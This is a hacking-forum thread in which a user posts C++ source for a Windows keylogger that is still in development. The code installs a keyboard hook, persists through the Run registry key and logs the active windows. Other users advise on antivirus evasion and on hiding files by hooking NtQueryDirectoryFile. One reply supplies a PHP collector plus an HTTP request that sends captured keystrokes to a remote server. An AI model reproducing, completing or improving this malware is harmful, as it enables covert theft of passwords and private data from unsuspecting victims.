Threaded Mode | Linear Mode

MC' · (This post was last modified: 03-27-2010 08:46 AM by MC'.)

Hey guys

I know most of the code here isn't purely malicious, but I figure I would post what I'm working on.

I also just programmed a binder using the UpdateResource api complete with a configuration file to support different files types. If you guys want to see it, express interest or PM me

Heres the code. Obviously, the final version won't be visible. I put it in a console window for now
It logs keys, but its not completed. I still need to use a system for naming files (See below, just made a snippet to work with time). I need to find a way to upload logs, to prevent multiple instances, and hopefully add some more hooks and modify the registry

Code:

/*

#include <windows.h>

#include <string>

#include <iostream>

#include <fstream>

#include <shlobj.h>

using namespace std;

void FirstRun(char*apppath);

LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam);

bool RegExitHotkey();

bool WriteToFile(char*fpath, string data);

bool WriteToFile(char*fpath, char*data);

bool HideFile(char*path);

void HotKeyPressed();

HHOOK hook;

HWND activewindow;

HWND oldwindow;

char wintext[256];

string data;

/*

TO DO

Prevent multiple instances

Clipboard

Upload

Name logs

System profile

Don't show hidden files (registry)

*/

int main()

{

    //prevent multiple instances

//check if keylogger is installed. If not, install and create system profile

//install for one user or all users? Check is user is admin?

//register exit key

//Name logs by date and time. at the start of each log, list all open windows

    char apppath[MAX_PATH];

    SHGetFolderPath(NULL, CSIDL_APPDATA, NULL, 0, apppath); //gets application data folders path

    strcat(apppath, "\\");

    strcat(apppath, "test"); //final name of file

    LPSECURITY_ATTRIBUTES attr;

    attr = NULL;

    if (CreateDirectory(apppath, attr))

    {

        FirstRun(apppath);

    }

    else if (GetLastError() == ERROR_ALREADY_EXISTS) //this keylogger is installed

    {

//already installed, name logs

    }

    hook = SetWindowsHookEx(

               WH_KEYBOARD_LL,

               KeyboardProc,

               GetModuleHandle(NULL), // returns the instance of your program, allows you to set a hook without using a dll

               // NULL,

               0);

    MSG msg;

    while (GetMessage(&msg, NULL, 0, 0))

    {

        if (msg.message == WM_HOTKEY)

        {

            HotKeyPressed();

        }

        TranslateMessage(&msg);

        DispatchMessage(&msg);

    }

    UnhookWindowsHookEx(hook);

    return 0;

}

void FirstRun(char*apppath)

{

    char filepath[MAX_PATH];

    GetModuleFileName(NULL ,filepath,MAX_PATH);

    strcat(apppath, "\\Keylogger.exe");

    if (CopyFile(filepath, apppath, true))//function fails if file exists

    {

        HKEY key;

        if (RegCreateKey(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&key) == 0)

        {

            RegSetValueEx((HKEY)key,"Keylogger",0,REG_SZ,(BYTE *)apppath,strlen(apppath));

        }

    }

}

LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)

{

    PKBDLLHOOKSTRUCT p = (PKBDLLHOOKSTRUCT) (lParam);

    unsigned long code = p->vkCode;

    if (nCode== HC_ACTION && wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN)

    {

        if (code <= 57 && code >= 48)

        {

            data += (char)code;

        }

        else if (code <= 105 && code >= 96)

        {

            data += (char)(code-48); //translates num pad to normal number keys

        }

        else if (code <= 90 && code >= 65) //translates from uppper to lower case

        {

            data += (char)(code+32);

        }

          else if (code <= 123 && code >= 112) //translates from uppper to lower case

        {

            data += "F";

            data += (code - 111);

        }

        else

        {

            switch (code)

            {

            case 13: //enter

                data += "\n";

                break;

            case 162:

                data += "[CTL]"; //left control

                break;

            case 163:

                data += "[CTL]"; //right control

                break;

            case 20:

                data += "[CAPS]";

                break;

            case 8: //backspace

                data += "[B]";

                break;

            case 32:

                data += " ";

                break;

            case 190:

                data += ".";

                break;

                 case 188:

                data += ",";

                break;

            case 161: //right shift

                data += "[S]";

                break;

            case 160: //left shift

                data += "[S]";

                break;

case 16: //default shift

                data += "[S]";

                break;

                case 17:

                data += "[CTL]";

                break;

                case 18:

                data += "[ALT]";

                break;

                case 91:

                data += "[WIN]";

                break;

                case 187:

                data += "=";

                break;

  case 144:

                data += "[NUM]";

                break;

            default:

                data+= "{";

                data+= code;

                data+= "}";

                break;

            }

        }

    }

    else  if (nCode== HC_ACTION && wParam == WM_KEYUP || wParam == WM_SYSKEYDOWN)

    {

        switch (code)

        {

        case 161:

            data += "[/S]";

            break;

        default:

            break;

        }

    }

    //log the active window

    free(wintext);

    oldwindow = activewindow;

    activewindow = GetForegroundWindow();

    if (activewindow!=oldwindow)

    {

        GetWindowText(activewindow, wintext, 256);

        data += "\n\t\t\t";

        data += wintext;

        data += "\n\n\n";

    }

//writes data to a file

    if (data.length() > 50)

    {

        WriteToFile("log2.txt", data);

        data.clear();

    }

    return CallNextHookEx(hook, nCode, wParam, lParam);

}

bool DoesFileExist(char*path) //Note- can be used for either files or directories

{

    if (GetFileAttributes(path)==INVALID_FILE_ATTRIBUTES)

    {

        return false;

    }

    return true;

}

bool HideFile(char*path) //makes file hidden, user can still see if their folder options are configured to

{

    if (SetFileAttributes(path, FILE_ATTRIBUTE_HIDDEN))

    {

        return true;

    }

    return false;

}

bool WriteToFile(char*fpath, string data)

{

    ofstream writer;

    writer.open(fpath, ios::out | ios::app);

    if (!writer.is_open())

    {

        return false;

    }

    writer << data;

    writer.close();

    return true;

}

bool WriteToFile(char*fpath, char*data)

{

    ofstream writer;

    writer.open(fpath, ios::out | ios::app);

    if (!writer.is_open())

    {

        return false;

    }

    writer << data;

    writer.close();

    return true;

}

void GetDate()

{

    time_t rawtime;

    struct tm * timeinfo;

    time ( &rawtime );

    timeinfo = localtime ( &rawtime );

}

bool RegExitHotkey()

{

    return RegisterHotKey(

               NULL,

               1,

               MOD_ALT | MOD_CONTROL,

               //MOD_ALT,

               0x42);  //0x42 is 'b'

}

void HotKeyPressed()

{

//uninstall/close/destroy everything

}

SNIPPET

#include <iostream>

#include <time.h>

using namespace std;

void GetDate()

{

    time_t rawtime;

    struct tm * timeinfo;

    time ( &rawtime );

    timeinfo = localtime ( &rawtime );

    char* times = asctime( timeinfo );

    cout << "The Local Time is: " << times << endl;

    char*splits = strtok(times, " :");

    int i = 0;

    while (splits!=NULL)

    {

        i++;

        //   cout << splits << endl;

        switch (i)

        {

        case 1:

            cout << "The weekday is " << splits << endl;

            break;

        case 2:

            cout << "The month is " << splits << endl;

            break;

        case 3:

            cout << "The day is " << splits << endl;

            break;

        case 4:

            cout << "The hour is " << splits << endl;

            break;

        case 5:

            cout << "The minute is " << splits << endl;

            break;

        case 6:

            cout << "The second is " << splits << endl;

            break;

        case 7:

            cout << "The year is " << splits << endl;

            break;

        }

        splits = strtok(NULL, " :");

    }

}

I think I'm going to name logs based on the day and time. I put the snippet at the end of the other code.

I've run into a few roadblocks. I cant seem to get a working global hook on the message queue, which would handle changes to the clipboard and foreground window. My code also won't install for all users, as the registry key would not add to HKEY_LOCAL_MACHINE

feel free to comments/criticism/help

***Back_track*** · 03-27-2010, 11:02 AM

Pretty good so far, Try this for upload
http://www.chilkatsoft.com/ftp-library.asp .

FreckleS · 03-27-2010, 03:16 PM

Makes me warm inside, great work!

***drdebcol*** · 03-28-2010, 12:58 AM

Good idea to use logs based on the day and time. I like the way that you used for handling. I skimmed through code and
i don't get all parts well, but my personal opinion is positive, it is good.

PoZHx · (This post was last modified: 03-28-2010 07:40 AM by PoZHx.)

There plenty of error in your code

Duplicated functions
Your included headers

Your not defining your API's with A or W...
Makes it pain to change when your porting it

Your to do list:
Don't show hidden files (registry)
Why not just learn how to make a keylogger and hook NtQueryDirectoryFile and filter out your file there?

Prevent multiple instances
CreateMutexA/W
http://msdn.microsoft.com/en-us/library/...S.85).aspx

Clipboard
OpenClipboard()
http://msdn.microsoft.com/en-us/library/...85%29.aspx

System profile
What?

Upload
Learn Winsock and sent it using SMTP

Your hide file is not going to help much/at all
Also you have alot of unnecessary code just wasting memory!

Also you have some weird coding lol
RegSetValueExA((HKEY)key.....)
Why you sending a HKEY cast when the variable "key" is already HKEY

Also you have no sort of protection against keeping it undetected from AV's
how do you expect it to keep undetected..
My SAH Tool would eat this keylogger for breakfast!

Why did you even post your code with so many mistake
took me like 5mins to fix your programming mistakes!

Once you've cleaned up your code
then i'll give you some good suggestions for you to research up

FreckleS · 03-28-2010, 08:42 AM

If it is 6.0 then there is no need for him to declare with A/W

PoZHx · 03-28-2010, 08:48 AM

(03-28-2010 08:42 AM)FreckleS Wrote: If it is 6.0 then there is no need for him to declare with A/W

I don't have Visual C++ 6.0 but it should be using A and W for API's

and MC should still define it as A/W in his programming so people with different compiler can compile it without changing code

MC' · 03-28-2010, 01:23 PM

Thanks for all the positive feedback guys! I'll be sure to post the code I as make improvements

(03-28-2010 07:34 AM)PoZHx Wrote: Why did you even post your code with so many mistake
took me like 5mins to fix your programming mistakes!

Once you've cleaned up your code
then i'll give you some good suggestions for you to research up

I am aware that there are mistakes. I am not the most experienced c++ programmer, and by taking on a large project and fixing my mistakes I'm becoming more experienced

I appreciate the fact that you are providing me help. I have put a good amount of time into programming what I have there, so please don't treat me like I'm throwing garbage at you

(03-28-2010 07:34 AM)PoZHx Wrote: Your to do list:
Don't show hidden files (registry)
Why not just learn how to make a keylogger and hook NtQueryDirectoryFile and filter out your file there?

Prevent multiple instances
CreateMutexA/W
http://msdn.microsoft.com/en-us/library/...S.85).aspx

Clipboard
OpenClipboard()
http://msdn.microsoft.com/en-us/library/...85%29.aspx

System profile
What?

Upload
Learn Winsock and sent it using SMTP

Your hide file is not going to help much/at all
Also you have alot of unnecessary code just wasting memory!

Also you have some weird coding lol
RegSetValueExA((HKEY)key.....)
Why you sending a HKEY cast when the variable "key" is already HKEY

Also you have no sort of protection against keeping it undetected from AV's
how do you expect it to keep undetected..
My SAH Tool would eat this keylogger for breakfast!

For uploading, why would you prefer winsock and sending with SMTP over uploading via ftp? I've never done either, but having seen some ftp code, it looks fairly simple

Also, could you elaborate on what you mean by protecting it against AV's to keep it UD?

Ill have to look into mutex functions and hooking NtQueryDirectoryFile. I'm not sure how important hiding the files would be, as much as the function. Would you know a way to hide the function?
I wasn't really intending to turn it into a keylogger-rootkit morph, but hiding files and processes would certainly be a nice addition

Also, when I said "system profile," I just meant that Id collect as much info about the user as I could on the first run, and write it to the first log.

Anyway, Ill keep on programming. Id like to remind you once again that I'm not a terribly experienced c++ programmer, so try to make the comments more constructive than critical

FreckleS · 03-28-2010, 01:42 PM

If you use FTP then the account details can easily be reversed/discovered. By using a connection such as a TCP you can simply create a request to a php file and the php code can actually write the contents to a file on the server.

PHP Code:

Code:

<?php

$file = "keys.log";

$info = $_GET['w'];

if (file_exists($file)) { //Check if the log exists.

    $Log_Write = "a"; //If the file exists, writing will just use the same file.

    $info = "\n".$info;

} else {

    $Log_Write = "x"; //If the file does not exist, create the file and add the line.

    $info = $info;

}

$open = fopen($file, $Log_Write) or chmod($file, 0777); //Opening the file.

if(!$open){

die('Cant open log file!');

}

$t = fwrite($open, $info); //Write to file..

fclose($open); //Close file..

?>

Then simply create the request. I don't have TCP example on me atm but a simple HTTP request works fine.

Code:

Dim req As Net.HttpWebRequest

            req = Net.HttpWebRequest.Create(hostName & "?w=" & keys)

That of course is VB but you should be able to work out how to do it in C++ easily enough.

***l3g1sl4tor*** · 03-28-2010, 08:58 PM

Here is something i found on the net (I am not so good at C++). This is example of way of uploading file on FTP server... The only "tricky" thing is CkUpload.h which i dont have in default dev c++ environment... On my opinion CkUpload.h contains information about custom variables used in the program down there...

Code:

#include <iostream>

      #include <CkUpload.h>

      using namespace std;

      void ChilkatSample(void)

      {

CkUpload upload;

      // Specify the page (ASP, ASP.NET, Perl, Python, Ruby, CGI, etc)

      // that will process the HTTP Upload.

      upload.put_Hostname("www.freeupload.com");

      upload.put_Path("/freeaspupload/testUpload.asp");

      // Add one or more files to be uploaded.

      upload.AddFileReference("file1","dude.gif");

      upload.AddFileReference("file2","pigs.xml");

      upload.AddFileReference("file3","sample.doc");

      // Do the upload. The method returns when the upload

      // is completed.

      // This component also includes asynchronous upload capability,

      // which is demonstrated in another example.

      bool success;

      success = upload.BlockingUpload();

      if (success != true) {

      printf("%s\n",upload.lastErrorText());

      }

      else {

      printf("Files uploaded!\n");

      }

      }

Source : daniweb